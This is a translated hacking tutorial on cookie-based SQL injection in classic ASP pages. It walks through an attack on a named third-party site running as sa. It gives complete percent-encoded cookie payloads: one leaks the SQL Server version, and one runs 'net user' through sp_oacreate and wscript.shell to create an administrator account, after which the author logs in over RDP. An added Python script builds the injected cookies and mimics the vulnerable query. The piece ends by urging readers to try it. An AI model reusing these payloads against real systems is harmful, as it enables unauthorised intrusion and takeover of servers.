Alternative injection attacks: cookie injection

Source: Internet
Author: User

 

I. Target locking
On MSN, a friend, icerover, messaged me with some questions about cookie injection. At the time I was reading the code of the Ant Cinema system and had found a cookie injection vulnerability in its chageusr.asp. Here is a brief analysis of its code:

================================ Code ================================

================================ Code ================================
From the brief analysis above we can see that userid and password are not filtered at all. Both userid and password come straight from the client's cookie, so all we need to do is place the injection statement in the client's cookie.
How to exploit it is not described here; it is covered below.
My friend told me that member.asp on the site www.chinaxxx.net has the same cookie injection vulnerability, and that the database connection runs as sa.
II. Penetration
The code of member.asp is as follows:
================================ Code ================================

 

================================ Code ================================
From the code above, Userid = Request.Cookies("Userid") and the similar lines show that the userid and email values come from the client's cookies and are not filtered in any way. They are then concatenated straight into the query:
StrQ = "select * from tb_users where usertype>0 and email='" & Email & "' and Userid=" & Userid
The query runs as built, so we only need to place the right statement in the cookie to take this site. And with sa permissions we can .... heh
III. Notes on cookie injection
1. The ; character. In a cookie, the semicolon separates one variable from the next, so do not put a bare semicolon in your injection statement; if you do, the cookie is split at that point and your statement breaks. Percent-encode it (%3B) instead.
2. Spaces. Spaces in a cookie are stripped automatically, so every space in your injection statement must be converted (%20).
That is about all there is to watch out for. Now let's start our injection journey.
IV. Inject, inject, and inject again
Its member.asp requires a login. The cookie after logging in looks like this:
Userid=5581; email=icerover%40msn%2Ecom; ASPSESSIONIDASARRRTT=OMOIFPICADICDLAMAKOGCNNH
Reorder it so that Userid comes last, which makes the injection easier:
Email=icerover%40msn%2Ecom; ASPSESSIONIDASARRRTT=OMOIFPICADICDLAMAKOGCNNH; Userid=5581;

Check the version:
The statement to append is " and 1=(select @@version);--". Comparing the integer 1 with the string returned by @@version forces a conversion that fails, and SQL Server quotes the version string in the resulting error. Percent-encoded it becomes:
%20%61%6E%64%20%31%3D%28%73%65%6C%65%63%74%20%40%40%76%65%72%73%69%6F%6E%29%3B%2D%2D
The complete cookie after conversion:
Email=icerover%40msn%2Ecom; ASPSESSIONIDASARRRTT=OMOIFPICADICDLAMAKOGCNNH; userid=5581%20%61%6E%64%20%31%3D%28%73%65%6C%65%63%74%20%40%40%76%65%72%73%69%6F%6E%29%3B%2D%2D;
The response (screenshot 1 in the original article, not reproduced here):
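The two cookie rules from section III and the encoding step above, as an added Python example (not code from the original article or from the site it describes). It builds the injected Cookie header the way the article does, then mimics what the classic-ASP page does with it: split on ';', URL-decode each value and concatenate it straight into SQL. The cookie names and values are those quoted in the article; the session id and the ASP parsing behaviour are assumptions for the simulation, and the hardening check at the end is an example fix, not the site's own code.

```python
"""Added example: cookie injection request builder and a mock of the ASP side.

Not from the original article. Cookie names/values are the ones the article
quotes; the session id is illustrative and the ASP parsing is simulated.
"""
from urllib.parse import unquote

# Cookie captured after login, as quoted in the article (session id illustrative).
BASE_COOKIES = {
    "Userid": "5581",
    "email": "icerover%40msn%2Ecom",
    "ASPSESSIONIDASARRRTT": "OMOIFPICADICDLAMAKOGCNNH",
}

# The article's first payload: a varchar->int conversion error that leaks @@version.
VERSION_PAYLOAD = " and 1=(select @@version);--"


def encode_payload(payload: str) -> str:
    """Percent-encode every byte of the payload.

    Two things would otherwise break it: ';' separates cookie pairs, and bare
    spaces are stripped from cookie values (the article's notes 1 and 2).
    Encoding everything sidesteps both; the ASP side decodes it again.
    """
    return "".join(f"%{b:02X}" for b in payload.encode("utf-8"))


def build_cookie(base: dict, target: str, payload: str, encode: bool = True) -> str:
    """Return a Cookie header with `payload` appended to cookie `target`.

    The injected cookie is moved to the end, as the article does, so the
    trailing ';--' comment has nothing after it in the decoded value.
    """
    parts = [f"{k}={v}" for k, v in base.items() if k != target]
    tail = encode_payload(payload) if encode else payload
    parts.append(f"{target}={base[target]}{tail}")
    return "; ".join(parts)


def parse_cookie_like_asp(header: str) -> dict:
    """Mimic Request.Cookies: split on ';', take name=value, URL-decode value.

    Assumed for this example: names are case-insensitive and a fragment with
    no '=' is kept as a name with an empty value.
    """
    jar = {}
    for item in header.split(";"):
        name, _, value = item.strip().partition("=")
        if name:
            jar[name.lower()] = unquote(value)
    return jar


def vulnerable_query(header: str) -> str:
    """The member.asp query as the article quotes it: raw string concatenation."""
    jar = parse_cookie_like_asp(header)
    return ("select * from tb_users where usertype>0 and email='"
            + jar.get("email", "") + "' and Userid=" + jar.get("userid", ""))


def hardened_userid(header: str) -> int:
    """The check the page lacks (example fix, not the site's code): Userid is a
    number, so refuse anything else before it gets near the query."""
    value = parse_cookie_like_asp(header).get("userid", "")
    if not value.isdigit():
        raise ValueError("Userid cookie must be a positive integer")
    return int(value)


if __name__ == "__main__":
    header = build_cookie(BASE_COOKIES, "Userid", VERSION_PAYLOAD)
    print(header)
    print(vulnerable_query(header))
    # A bare ';' in the payload is swallowed by the cookie parser: userid stays 5581.
    raw = build_cookie(BASE_COOKIES, "Userid", ";declare @o int;--", encode=False)
    print(parse_cookie_like_asp(raw)["userid"])
```

Running the block prints the encoded header from the article and the SQL it turns into; the unencoded variant shows why note 1 matters: the parser cuts the value at the first bare semicolon and the rest of the statement is lost.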


 
A port scan shows 3389 open, so we add a user straight away by injecting the following:
Statement to convert:
;declare @s varchar(21) set @s='wscript.shell' declare @o int exec sp_oacreate @s,@o out exec sp_oamethod @o,'run',NULL,'net.exe user linzi linzihk /add';exec sp_oamethod @o,'run',NULL,'net.exe localgroup administrators linzi /add';--
Encoded:
%3B%64%65%63%6C%61%72%65%20%40%73%20%76%61%72%63%68%61%72%28%32%31%29%20%73%65%74%20%40%73%3D%27%77%73%63%72%69%70%74%2E%73%68%65%6C%6C%27%20%64%65%63%6C%61%72%65%20%40%6F%20%69%6E%74%20%65%78%65%63%20%73%70%5F%6F%61%63%72%65%61%74%65%20%40%73%2C%40%6F%20%6F%75%74%20%65%78%65%63%20%73%70%5F%6F%61%6D%65%74%68%6F%64%20%40%6F%2C%27%72%75%6E%27%2C%4E%55%4C%4C%2C%27%6E%65%74%2E%65%78%65%20%75%73%65%72%20%6C%69%6E%7A%69%20%6C%69%6E%7A%69%68%6B%20%2F%61%64%64%27%3B%65%78%65%63%20%73%70%5F%6F%61%6D%65%74%68%6F%64%20%40%6F%2C%27%72%75%6E%27%2C%4E%55%4C%4C%2C%27%6E%65%74%2E%65%78%65%20%6C%6F%63%61%6C%67%72%6F%75%70%20%61%64%6D%69%6E%69%73%74%72%61%74%6F%72%73%20%6C%69%6E%7A%69%20%2F%61%64%64%27%3B%2D%2D
Modify the cookie as follows:
Email=icerover%40msn%2Ecom; ASPSESSIONIDASARRRTT=OMOIFPICADICDLAMAKOGCNNH; userid=5581%3B%64%65%63%6C%61%72%65%20%40%73%20%76%61%72%63%68%61%72%28%32%31%29%20%73%65%74%20%40%73%3D%27%77%73%63%72%69%70%74%2E%73%68%65%6C%6C%27%20%64%65%63%6C%61%72%65%20%40%6F%20%69%6E%74%20%65%78%65%63%20%73%70%5F%6F%61%63%72%65%61%74%65%20%40%73%2C%40%6F%20%6F%75%74%20%65%78%65%63%20%73%70%5F%6F%61%6D%65%74%68%6F%64%20%40%6F%2C%27%72%75%6E%27%2C%4E%55%4C%4C%2C%27%6E%65%74%2E%65%78%65%20%75%73%65%72%20%6C%69%6E%7A%69%20%6C%69%6E%7A%69%68%6B%20%2F%61%64%64%27%3B%65%78%65%63%20%73%70%5F%6F%61%6D%65%74%68%6F%64%20%40%6F%2C%27%72%75%6E%27%2C%4E%55%4C%4C%2C%27%6E%65%74%2E%65%78%65%20%6C%6F%63%61%6C%67%72%6F%75%70%20%61%64%6D%69%6E%69%73%74%72%61%74%6F%72%73%20%6C%69%6E%7A%69%20%2F%61%64%64%27%3B%2D%2D;
The expected response (screenshot 2 in the original article, not reproduced here):

Although an error page is displayed, the statement has already been executed. With terminal services enabled, we connect straight in with the 3389 login client. Bingo! The site is ours.
V. Summary:
Speechless. Go and try it out for yourselves!~~~
 
 
